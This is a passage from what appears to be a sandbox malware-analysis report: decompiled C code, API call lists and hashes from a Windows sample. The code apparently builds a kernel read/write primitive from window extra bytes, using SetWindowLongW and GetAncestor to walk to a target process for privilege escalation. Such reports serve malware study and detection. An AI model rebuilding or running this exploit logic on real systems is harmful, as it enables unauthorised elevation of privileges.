                      					SetWindowLongW( *0x958004,  *0x958018 + _t120 -  *0x95801c,  *(_t103 + _t58));
                      					_t124 = _v1016;
                      					_t99 = _t99 + 2;
                      					 *(_t133 + _t124 * 4 - 0x3ec) = _t66;
                      					_t125 = _t124 + 1;
                      					_t128 = _v1020 + 4;
                      					_v1016 = _t125;
                      					_v1020 = _t128;
                       				} while (lstrlenW( &_v1008) >= _t99 && _t99 < 0x1f4); // two characters per pass, capped at 500 (0x1f4)
                      				if(_t125 != 0xfa) {
                      					_t110 =  *0x957ff0; // 0x0
                      					_t100 = SetWindowLongW;
                      					SetWindowLongW( *0x958004,  *0x958018 + _t110 -  *0x95801c, _a4);
                      					_t131 = SetWindowTextW;
                      					SetWindowTextW( *0x958010,  &_v1008);
                      					_t78 = _v1024;
                      					if(_t78 != 0xffffffff) {
                      						 *((short*)(_t133 + _t78 - 0x3ec)) = 0;
                      						SetWindowTextW( *0x958010,  &_v1008);
                      					}
                      					_t79 = _v1012;
                      					if(_t79 != 0xffffffff) {
                      						 *((short*)(_t133 + _t79 - 0x3ec)) = 0;
                      						SetWindowTextW( *0x958010,  &_v1008);
                      					}
                      					_t112 =  *0x957ff0; // 0x0
                      					SetWindowLongW( *0x958004,  *0x958018 + _t112 -  *0x95801c, _v1028);
                       					ShowWindow( *0x958010, 5); // SW_SHOW
                      					UpdateWindow( *0x958010);
                      					return E0093161C(_t100, _v8 ^ _t133, _t121, _t125, _t131);
                      				} else {
                      					return E0093161C(_t99, _v8 ^ _t133, _t121, _t125, _t128);
                      				}
                      			}
                       Address gutter for the listing above (one instruction address per C line; the alignment with the listing was lost in extraction): 0x0093c4e9 to 0x0093c743.

                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: Window$Long$Textlstrlen$AncestorShowUpdate_memset
                      • String ID:
                      • API String ID: 2624496401-0
                      • Opcode ID: 3a57ebf7b0b7aecb2d71c08bea786358fcd2e136b3b27943c558d115f5c611f7
                      • Instruction ID: 3deff9c1181c6a79851d693aede049e8657d92f3e2eab585c98a8a17a6c47e0b
                      • Opcode Fuzzy Hash: 3a57ebf7b0b7aecb2d71c08bea786358fcd2e136b3b27943c558d115f5c611f7
                      • Instruction Fuzzy Hash: C2617571A242199FCB25CFA9DC85AAE73FCFB49311F0445A9E519E33D0CA30AE45AF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 100%
                      			E0093B6E0() {
                      				long _v8;
                      				intOrPtr _v16;
                      				intOrPtr _t28;
                      				struct HWND__* _t36;
                      				intOrPtr _t42;
                      				intOrPtr _t43;
                      				struct HWND__* _t51;
                      				intOrPtr _t57;
                      				struct HWND__* _t65;
                      				intOrPtr _t71;
                      				intOrPtr _t72;
                      				struct HWND__* _t80;
                      				long _t94;
                      				intOrPtr _t95;
                      				intOrPtr _t98;
                      				intOrPtr _t99;
                      				intOrPtr _t101;
                      				intOrPtr _t103;
                      				intOrPtr _t104;
                      				intOrPtr _t110;
                      				intOrPtr _t111;
                      				intOrPtr _t113;
                      				intOrPtr _t115;
                      				intOrPtr _t116;
                      				intOrPtr _t129;
                      				intOrPtr _t135;
                      				intOrPtr _t140;
                      				intOrPtr _t148;
                      
                      				E0093BEE0(E0093BEE0( *0x958020 +  *0x957ff8));
                      				_t148 = E0093BEE0(_t25);
                      				do {
                      					if( *0x95802c != 0) {
                      						_t94 =  *0x95802c;
                      					} else {
                      						_t94 = GetCurrentProcessId();
                      					}
                      					_t98 =  *0x958014;
                      					_t28 =  *0x957ff4; // 0x0
                      					_v8 =  *((intOrPtr*)(_t98 + _t28 + 4));
                      					_t99 =  *0x957ff4; // 0x0
                      					SetWindowLongW( *0x958004,  *0x958018 + _t99 -  *0x95801c,  *0x957ffc + _t148);
                      					_t36 = GetAncestor( *0x958010, 1);
                      					_t101 =  *0x957ff4; // 0x0
                      					SetWindowLongW( *0x958004,  *0x958018 + _t101 -  *0x95801c,  *(_t98 + _t28));
                      					_t42 =  *0x957ffc;
                      					_t140 = _t36 - _t42;
                      					_t103 =  *0x958014;
                      					_v8 = _t140;
                      					_t43 =  *0x957ff4; // 0x0
                      					_v16 =  *((intOrPtr*)(_t103 + _t43 + 4));
                      					_t104 =  *0x957ff4; // 0x0
                      					SetWindowLongW( *0x958004,  *0x958018 + _t104 -  *0x95801c, _t42 - 4 + _t140);
                      					_t51 = GetAncestor( *0x958010, 1);
                      					_t129 =  *0x957ff4; // 0x0
                      					SetWindowLongW( *0x958004,  *0x958018 + _t129 -  *0x95801c,  *(_t103 + _t43));
                      					_t148 = _v8;
                      				} while (_t51 != _t94);
                      				_t95 = _t148;
                      				_v8 =  *0x958000 + _t95;
                      				E0093BEE0( *0x958000 + _t95);
                      				do {
                      					_t110 =  *0x958014;
                      					_t57 =  *0x957ff4; // 0x0
                      					_v16 =  *((intOrPtr*)(_t110 + _t57 + 4));
                      					_t111 =  *0x957ff4; // 0x0
                      					SetWindowLongW( *0x958004,  *0x958018 + _t111 -  *0x95801c,  *0x957ffc + _t95);
                      					_t65 = GetAncestor( *0x958010, 1);
                      					_t113 =  *0x957ff4; // 0x0
                      					SetWindowLongW( *0x958004,  *0x958018 + _t113 -  *0x95801c,  *(_t110 + _t57));
                      					_t71 =  *0x957ffc;
                      					_t95 = _t65 - _t71;
                      					_t115 =  *0x958014;
                      					_t72 =  *0x957ff4; // 0x0
                      					_v16 =  *((intOrPtr*)(_t115 + _t72 + 4));
                      					_t116 =  *0x957ff4; // 0x0
                      					SetWindowLongW( *0x958004,  *0x958018 + _t116 -  *0x95801c, _t71 - 4 + _t95);
                      					_t80 = GetAncestor( *0x958010, 1);
                      					_t135 =  *0x957ff4; // 0x0
                      					SetWindowLongW( *0x958004,  *0x958018 + _t135 -  *0x95801c,  *(_t115 + _t72));
                      				} while (_t80 != 4);
                      				_t155 = E0093BEE0( *0x958000 + _t95);
                      				E0093C4E0((_t84 & 0xfffffff0) - 0x18, E0093BEE0((_t84 & 0xfffffff8) - 0x18) + 2);
                      				E0093C4E0(_v8, _t155);
                      				return 1;
                      			}

                      APIs
                        • Part of subcall function 0093BEE0: SetWindowLongW.USER32 ref: 0093BF1B
                        • Part of subcall function 0093BEE0: GetAncestor.USER32(?,00000001), ref: 0093BF29
                        • Part of subcall function 0093BEE0: SetWindowLongW.USER32 ref: 0093BF50
                      • GetCurrentProcessId.KERNEL32 ref: 0093B71C
                      • SetWindowLongW.USER32 ref: 0093B765
                      • GetAncestor.USER32(?,00000001), ref: 0093B76F
                      • SetWindowLongW.USER32 ref: 0093B799
                      • SetWindowLongW.USER32 ref: 0093B7DB
                      • GetAncestor.USER32(?,00000001), ref: 0093B7E5
                      • SetWindowLongW.USER32 ref: 0093B812
                      • SetWindowLongW.USER32 ref: 0093B86D
                      • GetAncestor.USER32(?,00000001), ref: 0093B877
                      • SetWindowLongW.USER32 ref: 0093B89B
                      • SetWindowLongW.USER32 ref: 0093B8E0
                      • GetAncestor.USER32(?,00000001), ref: 0093B8EA
                      • SetWindowLongW.USER32 ref: 0093B917
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: LongWindow$Ancestor$CurrentProcess
                      • String ID:
                      • API String ID: 754403503-0
                      • Opcode ID: 20ebee1d28cef62d8244d17bf9623b6dedf05b399ca089ca2ffd376ea5937971
                      • Instruction ID: ef995036673ec7928dc92e282481ef7cf73ee2a54ec426cb00cc02a21f77f741
                      • Opcode Fuzzy Hash: 20ebee1d28cef62d8244d17bf9623b6dedf05b399ca089ca2ffd376ea5937971
                      • Instruction Fuzzy Hash: FC717175A282009FC754DBBEED85EA773E9E78D316B044458E905E33A1DE30AD05EF60
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 94%
                      			E0093BD80() {
                      				signed int _v8;
                      				struct _WNDCLASSEXW _v56;
                      				intOrPtr* _t31;
                      				struct HWND__* _t41;
                      				signed int _t45;
                      				unsigned int _t46;
                      				unsigned int _t47;
                      				struct HWND__* _t51;
                      				void* _t58;
                      				void* _t61;
                      
                      				asm("xorps xmm0, xmm0");
                      				_v56.lpfnWndProc = DefWindowProcW;
                      				_v56.hInstance =  *0x958030;
                      				_v8 = 0;
                      				_v56.cbSize = 0x30;
                      				_v56.style = 0;
                      				_v56.cbClsExtra = 0;
                      				_v56.cbWndExtra = 0x118;
                      				asm("movdqu [ebp-0x1c], xmm0");
                      				_v56.lpszClassName = L"ExtraWnd1";
                      				_v56.hIconSm = 0;
                      				if(RegisterClassExW( &_v56) != 0) {
                      					_t41 = CreateWindowExW(0, L"ExtraWnd1", 0, 0, 0, 0, 0, 0, 0, 0,  *0x958030, 0);
                      					if(_t41 == 0) {
                      						L15:
                      						return 0;
                      					} else {
                      						_v56.lpszClassName = L"ExtraWnd2";
                      						_v56.cbWndExtra = 0x130;
                      						if(RegisterClassExW( &_v56) == 0) {
                      							goto L15;
                      						} else {
                      							_t51 = CreateWindowExW(0, L"ExtraWnd2", 0, 0, 0, 0, 0, 0, 0, 0,  *0x958030, 0);
                      							if(_t51 == 0) {
                      								goto L15;
                      							} else {
                      								_t58 = E0093C750(_t41);
                      								_t31 = E0093C750(_t51);
                      								if(_t58 == 0 || _t31 == 0) {
                      									goto L15;
                      								} else {
                      									_t46 =  *0x957fe8; // 0x0
                      									_t45 = 0;
                      									_t47 = _t46 >> 2;
                      									if(_t47 == 0) {
                      										L14:
                      										DestroyWindow(_t41);
                      										DestroyWindow(_t51);
                      										return _v8;
                      									} else {
                      										_t61 = _t58 - _t31;
                      										while( *((intOrPtr*)(_t61 + _t31)) != 0x118 ||  *_t31 != 0x130) {
                      											_t45 = _t45 + 1;
                      											_t31 = _t31 + 4;
                      											if(_t45 < _t47) {
                      												continue;
                      											} else {
                      												DestroyWindow(_t41);
                      												DestroyWindow(_t51);
                      												return _v8;
                      											}
                      											goto L16;
                      										}
                      										_v8 = _t45 * 4;
                      										goto L14;
                      									}
                      								}
                      							}
                      						}
                      					}
                      				} else {
                      					return 0;
                      				}
                      				L16:
                      			}


                      APIs
                      • RegisterClassExW.USER32 ref: 0093BDDA
                      • CreateWindowExW.USER32 ref: 0093BE0F
                      • RegisterClassExW.USER32 ref: 0093BE2D
                      • CreateWindowExW.USER32 ref: 0093BE57
                      • DestroyWindow.USER32(00000000,00000000,00000000), ref: 0093BEA6
                      • DestroyWindow.USER32(00000000), ref: 0093BEA9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: Window$ClassCreateDestroyRegister
                      • String ID: 0$ExtraWnd1$ExtraWnd2
                      • API String ID: 2025118016-772980788
                      • Opcode ID: bcc084f4644a98e8cf3b9ed215503aa7eb94929ae760d172799ea1ba6312b65f
                      • Instruction ID: 05560538a86370c105c4aaeda65b09165c0de2fb7ffea9536ac3633ccacbc72c
                      • Opcode Fuzzy Hash: bcc084f4644a98e8cf3b9ed215503aa7eb94929ae760d172799ea1ba6312b65f
                      • Instruction Fuzzy Hash: 99316372E152189BDB20DBA9EC41BEEB7FCEB45354F14415AEA04B7290DBB55D008FD0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 94%
                      			E0093CD40() {
                      				signed int _v8;
                      				struct _WNDCLASSEXW _v56;
                      				intOrPtr* _t31;
                      				struct HWND__* _t41;
                      				signed int _t45;
                      				unsigned int _t47;
                      				struct HWND__* _t51;
                      				void* _t58;
                      				void* _t61;
                      
                      				asm("xorps xmm0, xmm0");
                      				_v56.lpfnWndProc = DefWindowProcW;
                      				_v56.hInstance =  *0x9580b8;
                      				_v8 = 0;
                      				_v56.cbSize = 0x30;
                      				_v56.style = 0;
                      				_v56.cbClsExtra = 0;
                      				_v56.cbWndExtra = 0x118;
                      				asm("movdqu [ebp-0x1c], xmm0");
                      				_v56.lpszClassName = L"ExtraWnd1";
                      				_v56.hIconSm = 0;
                      				if(RegisterClassExW( &_v56) != 0) {
                      					_t41 = CreateWindowExW(0, L"ExtraWnd1", 0, 0, 0, 0, 0, 0, 0, 0,  *0x9580b8, 0);
                      					if(_t41 == 0) {
                      						L15:
                      						return 0;
                      					} else {
                      						_v56.lpszClassName = L"ExtraWnd2";
                      						_v56.cbWndExtra = 0x130;
                      						if(RegisterClassExW( &_v56) == 0) {
                      							goto L15;
                      						} else {
                      							_t51 = CreateWindowExW(0, L"ExtraWnd2", 0, 0, 0, 0, 0, 0, 0, 0,  *0x9580b8, 0);
                      							if(_t51 == 0) {
                      								goto L15;
                      							} else {
                      								_t58 = E0093C750(_t41);
                      								_t31 = E0093C750(_t51);
                      								if(_t58 == 0 || _t31 == 0) {
                      									goto L15;
                      								} else {
                      									_t45 = 0;
                      									_t47 =  *0x958060 >> 2;
                      									if(_t47 == 0) {
                      										L14:
                      										DestroyWindow(_t41);
                      										DestroyWindow(_t51);
                      										return _v8;
                      									} else {
                      										_t61 = _t58 - _t31;
                      										while( *((intOrPtr*)(_t61 + _t31)) != 0x118 ||  *_t31 != 0x130) {
                      											_t45 = _t45 + 1;
                      											_t31 = _t31 + 4;
                      											if(_t45 < _t47) {
                      												continue;
                      											} else {
                      												DestroyWindow(_t41);
                      												DestroyWindow(_t51);
                      												return _v8;
                      											}
                      											goto L16;
                      										}
                      										_v8 = _t45 * 4;
                      										goto L14;
                      									}
                      								}
                      							}
                      						}
                      					}
                      				} else {
                      					return 0;
                      				}
                      				L16:
                      			}

                      APIs
                      • RegisterClassExW.USER32 ref: 0093CD9A
                      • CreateWindowExW.USER32 ref: 0093CDCF
                      • RegisterClassExW.USER32 ref: 0093CDED
                      • CreateWindowExW.USER32 ref: 0093CE17
                      • DestroyWindow.USER32(00000000,00000000,00000000), ref: 0093CE66
                      • DestroyWindow.USER32(00000000), ref: 0093CE69
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: Window$ClassCreateDestroyRegister
                      • String ID: 0$ExtraWnd1$ExtraWnd2
                      • API String ID: 2025118016-772980788
                      • Opcode ID: 2a73e35107815a72e2fd35afdf9ca328056982e61c88115415770b4fa52be12a
                      • Instruction ID: 6bee7bf77c8b7ca93ddf1e8690072d486f122e93364e6050cbb886074a357812
                      • Opcode Fuzzy Hash: 2a73e35107815a72e2fd35afdf9ca328056982e61c88115415770b4fa52be12a
                      • Instruction Fuzzy Hash: 6C31A3B2E152189BDB20DBA9DC41BDEB7FDEB85350F140156E904B7290DBB59D048F90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 100%
                      			E0093B970(void* __ebx, void* __edi) {
                      				struct tagMSG _v32;
                      				intOrPtr _t6;
                      				intOrPtr _t8;
                      				int _t22;
                      
                      				// Globals 0x9441a4/0x9441a8 hold 0x320/0x258 (800/600). The window created below is a 1x1 pixel
                      				// WS_EX_LAYERED (0x80000) | WS_VISIBLE (0x10000000) window at (801, 601) with no title, parent or menu.
                      				// The address of each statement (the original side-by-side column) is given in the left margin.
                      /* 0x0093b97e */				_t6 =  *0x9441a8; // 0x258
                      /* 0x0093b98d */				_t8 =  *0x9441a4; // 0x320
                      /* 0x0093b9ab */				 *0x958048 = CreateWindowExW(0x80000, L"MyMainWnd", 0, 0x10000000, _t8 + 1, _t6 + 1, 1, 1, 0, 0,  *0x958030, 0);
                      /* 0x0093b9b7 */				if( *0x958048 == 0) {
                      /* 0x0093ba2f */					return 0;
                      /* 0x0093b9b9 */				} else {
                      /* 0x0093b9c0 */					E0093BFE0( *0x958048); // minimize/restore the new window to pull it to the foreground (subcalls listed under APIs)
                      /* 0x0093b9ca */					Sleep(0x32); // 50 ms
                      /* 0x0093b9e0 */					 *0x958044 = 1; // global flag: window exists
                      /* 0x0093b9ee */					if(GetMessageW( &_v32, 0, 0, 0) == 0) {
                      /* 0x0093ba29 */						return 0;
                      /* 0x0093b9f0 */					} else {
                      /* 0x0093ba00 */						do { // plain message pump; GetMessageW returns 0 on WM_QUIT (the -1 error return also keeps the loop going)
                      /* 0x0093ba04 */							TranslateMessage( &_v32);
                      /* 0x0093ba0a */							DispatchMessageW( &_v32);
                      /* 0x0093ba16 */							_t22 = GetMessageW( &_v32, 0, 0, 0);
                      /* 0x0093ba18 */						} while (_t22 != 0);
                      /* 0x0093ba22 */						return _t22;
                      /* 0x0093ba22 */					}
                      /* 0x0093b9ee */				}
                      			}

                      APIs
                      • CreateWindowExW.USER32 ref: 0093B9A5
                        • Part of subcall function 0093BFE0: GetForegroundWindow.USER32(?,?), ref: 0093BFE7
                        • Part of subcall function 0093BFE0: SystemParametersInfoW.USER32 ref: 0093C015
                        • Part of subcall function 0093BFE0: SystemParametersInfoW.USER32 ref: 0093C03C
                        • Part of subcall function 0093BFE0: SendMessageW.USER32(?,00000112,0000F020,00000000), ref: 0093C051
                        • Part of subcall function 0093BFE0: SendMessageW.USER32(?,00000112,0000F120,00000000), ref: 0093C060
                        • Part of subcall function 0093BFE0: SystemParametersInfoW.USER32 ref: 0093C07A
                      • Sleep.KERNEL32(00000032), ref: 0093B9CA
                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0093B9EA
                      • TranslateMessage.USER32(?), ref: 0093BA04
                      • DispatchMessageW.USER32 ref: 0093BA0A
                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0093BA16
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: Message$InfoParametersSystem$SendWindow$CreateDispatchForegroundSleepTranslate
                      • String ID: MyMainWnd
                      • API String ID: 2892696922-188152914
                      • Opcode ID: 646eb310dc51def7ee17f06e293be8ff4104fe67d58e957d009ba18865fd3cd0
                      • Instruction ID: 66df6ce6e9641ddf6cec73e00ecdfed728b720bb9cec1f072f7d8833d8255cfb
                      • Opcode Fuzzy Hash: 646eb310dc51def7ee17f06e293be8ff4104fe67d58e957d009ba18865fd3cd0
                      • Instruction Fuzzy Hash: 9C118272AA93086FE620DBA8EC46FE773ECE708715F100011FA08F71D0DAB4A8459F65
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 100%
                      			E0093C970(void* __ebx, void* __edi) {
                      				struct tagMSG _v32;
                      				intOrPtr _t6;
                      				intOrPtr _t8;
                      				int _t22;
                      
                      				// Same routine as E0093B970 reading a second set of globals: both coordinates are 0x1388 (5000), so the
                      				// 1x1 WS_EX_LAYERED | WS_VISIBLE window is created at (5001, 5001), off-screen on an ordinary desktop.
                      				// Statement addresses (the original side-by-side column) are given in the left margin.
                      /* 0x0093c97e */				_t6 =  *0x94424c; // 0x1388
                      /* 0x0093c98d */				_t8 =  *0x944248; // 0x1388
                      /* 0x0093c9ab */				 *0x9580d4 = CreateWindowExW(0x80000, L"MyMainWnd", 0, 0x10000000, _t8 + 1, _t6 + 1, 1, 1, 0, 0,  *0x9580b8, 0);
                      /* 0x0093c9b7 */				if( *0x9580d4 == 0) {
                      /* 0x0093ca2f */					return 0;
                      /* 0x0093c9b9 */				} else {
                      /* 0x0093c9c0 */					E0093D050( *0x9580d4); // foreground grab; unlike E0093BFE0 this variant also calls SetFocus and SetForegroundWindow
                      /* 0x0093c9ca */					Sleep(0x32); // 50 ms
                      /* 0x0093c9e0 */					 *0x9580d0 = 1; // global flag: window exists
                      /* 0x0093c9ee */					if(GetMessageW( &_v32, 0, 0, 0) == 0) {
                      /* 0x0093ca29 */						return 0;
                      /* 0x0093c9f0 */					} else {
                      /* 0x0093ca00 */						do { // plain message pump; GetMessageW returns 0 on WM_QUIT (the -1 error return also keeps the loop going)
                      /* 0x0093ca04 */							TranslateMessage( &_v32);
                      /* 0x0093ca0a */							DispatchMessageW( &_v32);
                      /* 0x0093ca16 */							_t22 = GetMessageW( &_v32, 0, 0, 0);
                      /* 0x0093ca18 */						} while (_t22 != 0);
                      /* 0x0093ca22 */						return _t22;
                      /* 0x0093ca22 */					}
                      /* 0x0093c9ee */				}
                      			}

                      APIs
                      • CreateWindowExW.USER32 ref: 0093C9A5
                        • Part of subcall function 0093D050: GetForegroundWindow.USER32(?,?), ref: 0093D057
                        • Part of subcall function 0093D050: SystemParametersInfoW.USER32 ref: 0093D085
                        • Part of subcall function 0093D050: SystemParametersInfoW.USER32 ref: 0093D0AC
                        • Part of subcall function 0093D050: SendMessageW.USER32(?,00000112,0000F020,00000000), ref: 0093D0C1
                        • Part of subcall function 0093D050: SendMessageW.USER32(?,00000112,0000F120,00000000), ref: 0093D0D0
                        • Part of subcall function 0093D050: SetFocus.USER32(?), ref: 0093D0D3
                        • Part of subcall function 0093D050: SetForegroundWindow.USER32(?), ref: 0093D0DA
                        • Part of subcall function 0093D050: SystemParametersInfoW.USER32 ref: 0093D0F8
                      • Sleep.KERNEL32(00000032), ref: 0093C9CA
                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0093C9EA
                      • TranslateMessage.USER32(?), ref: 0093CA04
                      • DispatchMessageW.USER32 ref: 0093CA0A
                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0093CA16
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: Message$InfoParametersSystemWindow$ForegroundSend$CreateDispatchFocusSleepTranslate
                      • String ID: MyMainWnd
                      • API String ID: 64861553-188152914
                      • Opcode ID: c917d349bf19102fa93c6143a2fb05f914377cfe425bbc862eb88ec7669af595
                      • Instruction ID: eba4278d4eab97227c9ed4909712f53ec2081aa689b9b82b90f4ae4896b2542c
                      • Opcode Fuzzy Hash: c917d349bf19102fa93c6143a2fb05f914377cfe425bbc862eb88ec7669af595
                      • Instruction Fuzzy Hash: 99118672A693086BE660DBA9EC46FD773ACE704715F100111FA08F71D0D6B4A8059FA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 77%
                      			E0093132F(void* __edi) {
                      				signed int _v8;
                      				short _v1032;
                      				short _v2056;
                      				signed int _v2060;
                      				void* __ebx;
                      				void* __esi;
                      				signed int _t11;
                      				void* _t22;
                      				void* _t25;
                      				void* _t35;
                      				void* _t36;
                      				long _t38;
                      				signed int _t39;
                      
                      				// Statement addresses (the original side-by-side column) are given in the left margin.
                      /* 0x0093132f */				_t36 = __edi;
                      /* 0x00931338 */				_t11 =  *0x943050; // 0xce43520a (MSVC __security_cookie)
                      /* 0x0093133f */				_v8 = _t11 ^ _t39; // stack canary: cookie ^ ebp
                      /* 0x00931359 */				GetModuleFileNameW(0,  &_v2056, 0x100); // own image path; this first copy is not used again
                      /* 0x0093135b */				_v2060 = _v2060 & 0x00000000; // IsWow64Process out-parameter := FALSE
                      /* 0x0093136e */				_t38 = GetModuleFileNameW(0,  &_v1032, 0x100);
                      				// Give up if the path could not be read, was truncated (ERROR_INSUFFICIENT_BUFFER = 0x7a),
                      				// or CharUpperBuffW did not upper-case every character.
                      /* 0x00931372 */				if(_t38 == 0 || GetLastError() == 0x7a || CharUpperBuffW( &_v1032, _t38) != _t38) {
                      /* 0x009313e3 */					L8:
                      /* 0x00000000 */					goto L9;
                      /* 0x00931391 */				} else {
                      /* 0x00931397 */					_t22 = E009312D8( &_v1032); // check on the upper-cased image path (body not in this report); non-zero skips everything below
                      /* 0x009313a0 */					asm("sbb eax, eax");
                      /* 0x009313a4 */					if(0 != _t22) {
                      /* 0x00000000 */						goto L8;
                      /* 0x00000000 */					}
                      /* 0x009313ad */					_t25 = GetCurrentProcess();
                      /* 0x009313b4 */					__imp__IsWow64Process(_t25,  &_v2060);
                      				// Decompiler quality 77%: GetCurrentProcess() returns the pseudo-handle -1 and is never 0, so the first
                      				// operand below is really the BOOL returned by IsWow64Process. A failed call or a non-WOW64 process
                      				// (32-bit Windows) goes to E0093BA30; a 32-bit process on 64-bit Windows goes to E0093CA30. The report
                      				// lists two near-identical window routines for the two paths (E0093B970/E0093BFE0 and E0093C970/E0093D050).
                      /* 0x009313bc */					if(_t25 == 0 || _v2060 == 0) {
                      /* 0x009313dc */						E0093BA30(0x100, _t35, GetCurrentProcessId());
                      /* 0x009313c7 */					} else {
                      /* 0x009313ce */						E0093CA30(0x100, _t35, GetCurrentProcessId()); // Sleep(200), GetModuleHandleA(0), LoadLibraryA("USER32.dll") per the subcall list
                      /* 0x009313ce */					}
                      /* 0x009313e5 */					L9:
